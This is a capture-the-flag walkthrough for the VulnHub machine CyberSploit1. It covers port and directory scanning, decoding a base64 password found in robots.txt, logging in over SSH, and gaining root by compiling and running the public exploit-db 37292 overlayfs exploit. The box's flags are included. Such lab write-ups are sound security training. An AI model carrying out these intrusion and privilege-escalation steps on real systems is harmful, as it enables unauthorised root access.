CyberSploit1

OG Vulnhub box: https://www.vulnhub.com/entry/cybersploit-1,506/

Since target was given I don't have to run netdiscover to find target:

Target is: 192.168.52.92

$ nmap 192.168.52.92 -p- -sV

Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-20 17:07 EDT

Nmap scan report for 192.168.52.92

Host is up (0.0013s latency).

Not shown: 65533 closed tcp ports (conn-refused)

PORT   STATE SERVICE VERSION

22/tcp open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)

80/tcp open  http    Apache httpd 2.2.22 ((Ubuntu))Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 9.31 seconds

Check firefox on 80

This image shows up. Time to check directories and subdirectories. Time to run dirb and subdirwith the former for directories(website.com/page1) and latter for subdirectories such as app.website.com

???(kali?kali)-[~]

??$ dirb http://192.168.52.92  

-----------------

DIRB v2.22    

By The Dark Raver

-----------------

START_TIME: Thu Apr 20 21:19:08 2023

URL_BASE: http://192.168.52.92/

WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

                                                                    GENERATED WORDS: 4612

---- Scanning URL: http://192.168.52.92/ ----

                                                                    + http://192.168.52.92/cgi-bin/ (CODE:403|SIZE:289)                

+ http://192.168.52.92/hacker (CODE:200|SIZE:3757743)              

+ http://192.168.52.92/index (CODE:200|SIZE:2333)                  

+ http://192.168.52.92/index.html (CODE:200|SIZE:2333)             

+ http://192.168.52.92/robots (CODE:200|SIZE:53)                   

+ http://192.168.52.92/robots.txt (CODE:200|SIZE:53)               

+ http://192.168.52.92/server-status (CODE:403|SIZE:294)           

-----------------

END_TIME: Thu Apr 20 21:19:12 2023

DOWNLOADED: 4612 - FOUND: 7

Saw robots.txt so going there and I find a base64 looking string

Y3liZXJzcGxvaXR7eW91dHViZS5jb20vYy9jeWJlcnNwbG9pdH0=

AI decoding with cyberchef verification yields

The text you provided appears to be a Base64 encoded string. Let me decode it for you:

"Y3liZXJzcGxvaXR7eW91dHViZS5jb20vYy9jeWJlcnNwbG9pdH0="

Decoded result: "cybersploit{youtube.com/c/cybersploit}"

It seems to be a URL for a YouTube channel named "cybersploit".

Checking page source code also nets the user itsskv

Try logging into ssh now with the username and the base64 password

ls in . and see flag2.txt but after a cat the flag is another file. Checking out local.txt I find a string of text which I submit as the flag and get the first 50%.

Now for root.

Checking the OS version first

itsskv@cybersploit-CTF:~$ uname -a

Linux cybersploit-CTF 3.13.0-32-generic #57~precise1-Ubuntu SMP Tue Jul 15 03:50:54 UTC 2014 i686 athlon i386 GNU/Linux

itsskv@cybersploit-CTF:~$ cat /etc/issue

Ubuntu 12.04.5 LTS \n \l

itsskv@cybersploit-CTF:~$ 

Now to check for local exploits on Ubuntu 12.04.5 LTS on exploitdb

https://www.exploit-db.com/exploits/37292

Now downloading one of the exploits for local. Will use the overlayFS one as it's the "latest" one

???(kali?kali)-[~]

??$ scp 37292.c itsskv@192.168.52.92:/home/itsskv

itsskv@192.168.52.92's password: 

37292.c  

Now the c exploit is on the target machine for a local privesc

itsskv@cybersploit-CTF:~$ ls

37292.c    Downloads         local.txt  Public

Desktop    examples.desktop  Music      Templates

Documents  flag2.txt         Pictures   Videos

itsskv@cybersploit-CTF:~$ 

Now time to compile the c code then run the program

itsskv@cybersploit-CTF:~$ gcc 37292.c 

itsskv@cybersploit-CTF:~$ ./a.out 

spawning threads

mount #1

mount #2

child threads done

/etc/ld.so.preload created

creating shared library

# whoami

root

# 

cool.

Opportunity to upgrade shell to a more stable one here. Use shell upgrade commands.

Now to look through root's files

# ls

37292.c    Downloads  Public     a.out             local.txt

Desktop    Music      Templates  examples.desktop

Documents  Pictures   Videos     flag2.txt

# cd /

# ls

bin    home            media  run      tmp

boot   initrd.img      mnt    sbin     usr

cdrom  initrd.img.old  opt    selinux  var

dev    lib             proc   srv      vmlinuz

etc    lost+found      root   sys      vmlinuz.old

# cd root

# ls

Desktop    Downloads  Pictures  Templates  finalflag.txt

Documents  Music      Public    Videos     proof.txt

# cat finalflag.txt

Your flag is in another file...

# cat proof.txt

f2cb93ee2456de2ec462b74e2f5620b8

And Boot2Root 🐱‍💻